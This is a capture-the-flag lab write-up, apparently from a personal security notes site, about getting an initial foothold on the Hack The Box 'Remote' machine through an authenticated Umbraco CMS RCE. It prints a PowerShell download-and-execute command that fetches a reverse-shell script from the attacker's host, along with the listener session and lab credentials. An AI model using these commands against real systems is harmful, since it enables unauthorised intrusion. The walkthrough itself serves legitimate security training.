InfoSec LAB

Remote_Exploitation

Created: 2 min read

Remote Code Execution

As discovered earlier, Umbraco CMS 7.14.2 suffer from a RCE vulnerability

I will be exploiting that to gain a foothold on the target system

Exploit

I found an exploit online

Exploitation

┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ python3 umbraco_7_12_4_RCE.py -h                                                                                                    
usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]
 
Umbraco authenticated RCE
 
options:
  -h, --help                 show this help message and exit
  -u USER, --user USER       username / email
  -p PASS, --password PASS   password
  -i URL, --host URL         root URL
  -c CMD, --command CMD      command
  -a ARGS, --arguments ARGS  arguments

The instruction seems straight forward

┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ simplehttp .             
serving http on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Hosting the payload over HTTP

┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ python3 umbraco_7_12_4_rce.py -u admin@htb.local -p baconandcheese -i http://$IP/ -c 'powershell.exe' -a "-ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.5:8000/Invoke-PowerShellTcp.ps1')"

Executing.. I had to play around with the quotation marks due to parsing errors

The target web application processes picked up the payload.

┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.180] 49747
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
 
ps c:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool
ps c:\windows\system32\inetsrv> hostname
remote
ps c:\windows\system32\inetsrv> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::ba
   ipv6 address. . . . . . . . . . . : dead:beef::25dd:3404:8d18:2459
   link-local ipv6 address . . . . . : fe80::25dd:3404:8d18:2459%12
   ipv4 address. . . . . . . . . . . : 10.10.10.180
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%12
                                       10.10.10.2

Initial Foothold established to the target system as the iis apppool\defaultapppool user

Interactive Graph View

Backlinks